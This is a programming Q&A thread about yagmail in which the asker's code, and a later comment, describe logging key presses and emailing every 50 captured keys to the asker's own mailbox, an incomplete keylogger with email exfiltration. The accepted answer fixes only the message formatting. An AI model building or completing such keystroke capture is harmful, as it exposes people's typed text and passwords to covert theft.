# Python - Sending mails using YAGMAIL with lists

Tags: python, yagmail

So I am trying to send mails with yagmail in Python and I have an array or list I want to send. And when i get the mail there's no content inside it. Why's that?

```
import yagmail

keys = []

listToStr = ' '.join([str(elem) for elem in keys]) 


def send(keys):
    print('test')
    yag = yagmail.SMTP('myactualmailishere', 'myactualpassishere')
    yag.send('myactualrecieverishere', 'Test', listToStr)

def on_press(key):
    global keys, count
    count += 1

    if count >= 50:
        count = 0
        send(keys)
        keys = []
```

Comment: You are not using `keys` variable anywhere in your `send(keys)` method. Is that expected?

Comment: @Mayak Porwal oh I don't think so I'm kinda new

Answer (score 1, accepted):

So you need to understand a few thing before sending emails through [`yagmail`](https://pypi.org/project/yagmail/):

- `yagmail` is a wrapper library on top of [`smtplib`](https://docs.python.org/3/library/smtplib.html), which is a standard lib for sending emails through python.
- You can either send `Plain Text Email` or `HTML emails`. Your case looks more like a `Plain text email`.

So, sending mails through `yagmail` should not functionally differ from `smtplib`.

So, the code should be roughly like this:

```
import yagmail

keys = ['a','b','c','d']
listToStr = ' '.join([str(elem) for elem in keys]) 

message = """\
Subject: Hi there. My list is {}.

This message is sent from Python."""

yag = yagmail.SMTP('myactualmailishere', 'myactualpassishere')
yag.send('myactualrecieverishere', 'Test', message.format(listToStr))
```

This should send a plain email with text in `message` and `{}` replaced by 
 `listToStr`.

Try the above and then break down your code in methods to achieve your funtionality.

Comment: But that just sents a b c d. I want it to save all the keys pressed and every 50 keys pressed it should send all the keys pressed to my email. Sorry if I am being unclear

Comment: I think you are asking multiple questions in one post here. As far as I understood, your question was targeted to understand how to send lists as email from `yagmail`. Pressing keys and recording the input seems like another question.

Comment: I guess. But showing the text works so should I just make another StackOverflow question?